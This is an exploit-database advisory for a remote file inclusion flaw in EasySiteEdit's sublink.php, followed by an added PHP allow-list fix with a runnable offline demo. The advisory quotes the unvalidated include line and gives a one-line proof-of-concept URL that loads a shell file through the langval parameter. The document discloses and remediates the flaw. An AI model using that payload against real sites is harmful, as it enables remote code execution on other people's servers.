EasySiteEdit - Remote File Inclusion

Author: koskesh jakesh
type: webapps
platform: php
date_added: 2011-08-21 
date_updated: 2011-08-21 
verified: 0 
codes: OSVDB-74912 
application_url: http://www.exploit-db.comesev2.zip

# Exploit Title: EasySiteEdit Remote File Inclusion
# Date: 2011
# Author: koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: Linux
-------------------------------
Vulnerable file: sublink.php
Line 20 passes the request parameter langval to include() without validation:
include($_REQUEST['langval']);
-------------------------------
PoC:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat
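
A hardened replacement for the include on line 20 of sublink.php, added here as an example and not taken from EasySiteEdit or from the advisory's author. The language codes, the `lang/` directory layout and the function name `resolve_language_file` are assumptions; the demo files are constructed.

```php
<?php
// Added example, not EasySiteEdit code. The language codes, file layout and
// function name are assumptions made for illustration.
//
// Pattern reported in sublink.php, line 20:
//     include($_REQUEST['langval']);

const ALLOWED_LANGS = ['en', 'de', 'fr'];   // assumed set of shipped languages
const DEFAULT_LANG  = 'en';

// Map a request value to a language file inside $langDir, never outside it.
function resolve_language_file(string $langDir, $requested): string
{
    // Non-strings (e.g. langval[]=x) and unknown codes fall back to the default.
    $code = is_string($requested) ? strtolower(trim($requested)) : '';
    if (!in_array($code, ALLOWED_LANGS, true)) {
        $code = DEFAULT_LANG;
    }
    // The path is built from the allow-listed code only, never from user input.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $code . '.php');
    // Defence in depth: the resolved file must exist and sit inside $langDir
    // (realpath() also resolves symlinks that point elsewhere).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $path;
}

// In sublink.php the include would become:
//     include resolve_language_file(__DIR__ . '/lang', $_GET['langval'] ?? DEFAULT_LANG);

// Constructed demo so the script runs offline: temporary language files.
$dir = sys_get_temp_dir() . '/ese_lang_' . getmypid();
mkdir($dir);
foreach (ALLOWED_LANGS as $l) {
    file_put_contents("$dir/$l.php", "<?php return ['lang' => '$l'];");
}
// 'shell.txt?' is the value from the PoC above; the others are constructed.
foreach (['de', ' FR ', 'shell.txt?', 'xx', ['x']] as $sample) {
    $file    = resolve_language_file($dir, $sample);
    $strings = include $file;              // always one of the files created above
    echo json_encode($sample), ' -> ', basename($file), ' (', $strings['lang'], ")\n";
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

Keeping `allow_url_include = Off` in php.ini stops include() from fetching URLs, but local file inclusion through the same parameter remains possible until the parameter is mapped through an allow-list like the one above.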